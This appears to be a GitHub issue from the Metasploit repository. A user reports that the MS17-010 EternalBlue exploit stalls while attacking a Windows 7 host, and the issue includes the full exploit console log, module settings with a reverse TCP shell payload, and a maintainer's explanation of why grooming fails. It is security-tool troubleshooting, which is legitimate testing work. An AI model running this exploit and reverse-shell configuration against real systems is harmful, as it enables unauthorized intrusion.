Metasploit-framework: MS17-010 ETERNALBLUE overwrite completed successfully- stuck at Triggering free of corrupted buffer

Created on 10 Jun 2019 · 1 Comment · Source: rapid7/metasploit-framework

```
[+] 10.20..:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate N 7600 x86 (32-bit)
[*] 10.20..:445 - Connecting to target for exploitation.
[+] 10.20..:445 - Connection established for exploitation.
[+] 10.20..:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.20..:445 - CORE raw buffer dump (25 bytes)
[*] 10.20..:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 10.20..:445 - 0x00000010  74 65 20 4e 20 37 36 30 30                       te N 7600
[+] 10.20..:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.20..:445 - Trying exploit with 12 Groom Allocations.
[*] 10.20..:445 - Sending all but last fragment of exploit packet
[*] 10.20..:445 - Starting non-paged pool grooming
[+] 10.20..:445 - Sending SMBv2 buffers
[+] 10.20..:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.20..:445 - Sending final SMBv2 buffers.
[*] 10.20..:445 - Sending last fragment of exploit packet!
[*] 10.20..:445 - Receiving response from exploit packet
[+] 10.20..:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.20..:445 - Sending egg to corrupted connection.
[*] 10.20..:445 - Triggering free of corrupted buffer.
[-] 10.20..:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.20..:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.20..:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
```

```
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.20..          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.20..          yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
```

Expected behavior

Expected meterpreter session opened.

What happens instead?

Exploit stuck at Triggering free of corrupted buffer. FAIL

Metasploit version

Framework: 5.0.27-dev
Console : 5.0.27-dev

I installed Metasploit with:

  • [ ] Kali package via apt

What OS are you running Metasploit on?

Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2019.2

enhancement module

Most helpful comment

Sometimes the eblue groom simply doesn't work due to network latency or the volatile nature of kernel allocations. The FuzzBunch exploit also fails like this. That you received 0xC000000D is a good sign though, means you didn't overwrite a region immediately BSoD-sensitive/nonexistent.
